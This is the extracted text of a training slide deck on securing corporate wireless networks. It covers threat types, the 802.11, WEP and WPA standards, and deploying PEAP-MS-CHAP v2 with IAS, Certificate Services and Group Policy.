Implementing Security for Wireless Networksdownload.microsoft.com/download/e/9/d/e9d163db-5c96... · 802.11 A base specification that defines the transmission concepts for Wireless

Implementing Security for Wireless Networks

Action Items for this session• Learn something!• Take notes! • Fill out that evaluation. I love to see your comments and

we want to make these better!• Most important: Have fun today!

Why should you care about wireless security?B ecause “31337 h4x0r” like this: … are equipping vehicles like this: … and using tools like these:… to get info about your W LA N :… so they crack it and gain access:… so they can “ØwN jØ Ø ” like this:

They have their own convention!

Agenda• Overview of Wireless Solutions• Securing a Wireless Network• Implementing a WLAN Using Password

Authentication• Configuring Wireless Network

Infrastructure Components• Configuring Wireless Network Clients

When designing security for a wireless network consider:• Network authentication and authorization• Data protection• Wireless access point configuration• Security management

Identifying the Need to Secure a Wireless Network

The abuse is growing!

Security Threats Include:• 1.Disclosure of confidential information • 2.Unauthorized access to data• 3.Impersonation of an authorized client• 4.Interruption of the wireless service • 5.Unauthorized access to the Internet• 6.Accidental threats• 7.Unsecured home wireless setups• 8.Unauthorized WLAN implementations

Common Threats to Wireless Networks

Understanding the Standards and Technologies

Standard Description

802.11 A base specification that defines the transmission concepts for Wireless LANs

802.11a Transmission speeds up to 54 megabits (Mbps) per second

802.11b11 MbpsGood range

802.11g

802.11i (WPA2)

54 Mbps Shorter ranges than 802.11bEstablishes a standard authentication and encryption process for wireless networks

802.1X - a standard that defines a port-based access control mechanism of authenticating access to a network and, as an option, for managing keys used to protect traffic

Wireless network implementation options include:• Wi-Fi Protected Access with Pre-Shared Keys

(WPA-PSK)• Wireless network security using Protected

Extensible Authentication Protocol (PEAP) and passwords

• Wireless network security using Certificate Services

Implementation Options

Choose the right solution

Wireless Network Solution

TypicalEnvironment

Additional Infrastructure Components

Required?

Certificates Used for Client

Authentication

Passwords Usedfor Client

Authentication

Typical Data Encryption

Method

Wi-Fi Protected Access with Pre-

Shared Keys (WPA-PSK)

Small Office/Home

Office (SOHO)None NO

YES Uses WPA

encryption key to authenticate to

network

WPA

Password-based wireless network

securitySmall to medium

organization

Internet Authentication Services (IAS)

Certificate required for the

IAS server

NO However, a

certificate is issued to validate the IAS

server

YES WPA or Dynamic WEP

Certificate-based wireless network

securityMedium to large

organization

Internet AuthenticationServices (IAS)

CertificateServices

YES

NO Certificates used

but may be modified to require

passwords

WPA or Dynamic WEP




Effective Authentication and AuthorizationStandard Description

Extensible Authentication Protocol-Transport Layer Security (EAP-TLS)

Uses public key certificates to authenticate clients

Protected Extensible Authentication Protocol-Microsoft-Challenge Handshake Authentication

Protocol v2 (PEAP-MS-CHAP v2)

A two-stage authentication method using a combination of TLS and MS-CHAP v2 for password authentication

Tunneled Transport Layer Security (TTLS)A two-stage authentication method similar to PEAPMicrosoft does not support this method

Wireless data encryption standards in use today include:• Wired Equivalent Privacy (WEP)

• Dynamic WEP, combined with 802.1X authentication, provides adequate data encryption and integrity

• Compatible with most hardware and software devices• H ow is this a “wired equivalent”?! T rust m e: WEP sucks!

• Wi-Fi Protected Access (WPA/WPA2)• Changes the encryption key with each packet• Uses a longer initialization vector • Adds a signed message integrity check value• Incorporates an encrypted frame counter• WPA uses TKIP, WPA2 uses AES

Protecting WLAN Data Transmissions

System Requirements for 802.1X

Components Requirements

Client devicesWindows XP and Pocket PC 2003 provide built-in supportMicrosoft provides an 802.1X client for Windows 2000 operating systems

RADIUS/IAS and certificate servers

Windows Server 2003 Certificate Services and Windows Server 2003 Internet Authentication Service (IAS) are supported

Wireless access points

At a minimum, should support 802.1X authentication and 128-bit WEP for data encryption

• Require data protection for all wireless communications

• Require 802.1X authentication to help prevent spoofing, wardrivers, and accidental threats to your network

• Use tools to locate and shut down rogue access points on your corporate network:• “O ver the A ir” - Disassociation attack on rogue APs• “O ver the W ire” – Automatic switch port shutdown

Guidelines for Securing Wireless Networks




Components for PEAP-MS-CHAP v2

Components Explanation

Wireless ClientRequires a WLAN adapter that supports 802.1X and dynamic WEP or WPA encryptionUser and computers accounts are created in the domain

Wireless Access Point

Must support 802.1X and dynamic WEP or WPA encryptionThe wireless access point and RADIUS server have a shared secret to enable them to securely identify each other

RADIUS/IAS Server

Uses Active Directory to verify the credentials of WLAN clientsMakes authorization decisions based upon an access policyMay also collect accounting and audit informationCertificate installed to provide server authentication




Preparing the Environment

Install the WLAN Scripts using:• Microsoft WLAN-PEAP.msi

Install the additional tools on the IAS servers:• Group Policy Management Console• CAPICOM• DSACLs.exe

Configuring the Certification Authority

• The CA is used to issue Computer Certificates to the IAS Servers

• To install Certificate Services, log on with an account that is a member of:• Enterprise Admins• Domain Admins

• Consider that Certificate Services in Window Server 2003 Standard Edition does not provide:• Auto enrollment of certificates to both computers and users• Version 2 certificate templates • Editable certificate templates • Archival of keys

Certificate Templates Available: Computer (Machine)Drive and path of CA request files: C:\CAConfigLength of CA Key: 2048 bitsValidity Period: 25 yearsValidity Period of Issued Certificates: 2 yearsCRL Publishing Interval: 7 daysCRL Overlap Period: 4 days

Reviewing the CA Installation Parameters

1. Run MSSsetup CheckCAenvironment2. Run MSSsetup InstallCA3. Run MSSsetup VerifyCAInstall4. Run MSSsetup ConfigureCA5. Run MSSSetup ImportAutoenrollGPO6. Run MSSsetup VerifyCAConfig

• Y ou can do all this in the G U I… .but w hy?

Installing the Certification Authority

Configuring the Certification Authority

Install CA

Configuring Post-Installation Settings

Importing the Automatic Certificate Request GPO

Verifying the Configuration

demo

Internet Authentication Service (IAS) uses Active Directory to verify and authenticate client credentials and makes authorization decisions based upon configured policies.

IAS configuration categories include:• IAS Server Settings• IAS Access Policies• RADIUS Logging

Configuring IAS

IAS parameters that are to be configured include:• IAS Logging to Windows Event Log• IAS RADIUS Logging• Remote Access Policy• Remote Access Policy Profile

Are we going to script this?! Yes Sir!!!

Reviewing IAS Configuration Parameters

Configuring the IAS ServerValidating the IAS Environment

Verifying IAS Server Certificate Deployment

Post-Installation Configuration Tasks

Modifying the WLAN Access Policy Profile Settings

Verifying the Connection Request Policy for WLAN

Exporting the IAS Settings

demo

Configure the basic network settings such as :• IP configuration of the access point • Friendly name of the access point • Wireless network name (SSID)

Typical Settings for a Wireless Access Point include:• Authentication parameters• Encryption parameters• RADIUS authentication• RADIUS accounting

WAP Configuration Parameters

Wireless Access Point Configuration

Adding Access Points to the Initial IAS Server

Configuring Wireless Access Pointsdemo




Controlling WLAN AccessUsing Security Groups

Security Group Default Members

Wireless LAN AccessWireless LAN UsersWireless LAN Computers

Wireless LAN Users Domain Users

Wireless LAN Computers Domain Computers

IAS enables you to control access to the wireless network using Active Directory security groups that are linked to a specific remote access policy

Reviewing WLAN Client Parameters

Parameter Setting

Group to allow WLAN access Wireless LAN Access

Group to allow WLAN access for users Wireless LAN Users

Group to allow WLAN access for computers Wireless LAN Computers

WLAN GPO Name WLAN Client Settings

GPO filtering security group Wireless LAN Computer Settings

Wireless network policy name Windows XP WLAN Client Settings (PEAP-WEP)

WLAN network name (SSID) CONTOSO (change this to your SSID)

EAP type PEAP

PEAP authentication method Secured Password (EAP-MSCHAP v2)

PEAP fast reconnect Enabled

Creating the WLAN Client Settings GPO

Create a WLAN Client GPO Using the GPMCdemo

• There are bad people out there who want your WLAN, but you can deploy it securely!

• D eterm ine your organization’s w ireless requirem ents• Require 802.1X authentication• Implement the PEAP and Passwords solution for

organizations that do not utilize a PKI infrastructure• Use the scripts provided by the PEAP and Passwords

solution• Use security groups and Group Policy to control WLAN client

access• (… .and stop kidding yourself w ith W E P )

Session Summary

Questions and Answers

Go away for 15 minutes

Documents

Implementing Security for Wireless Networksdownload.microsoft.com/download/e/9/d/e9d163db-5c96... · 802.11 A base specification that defines the transmission concepts for Wireless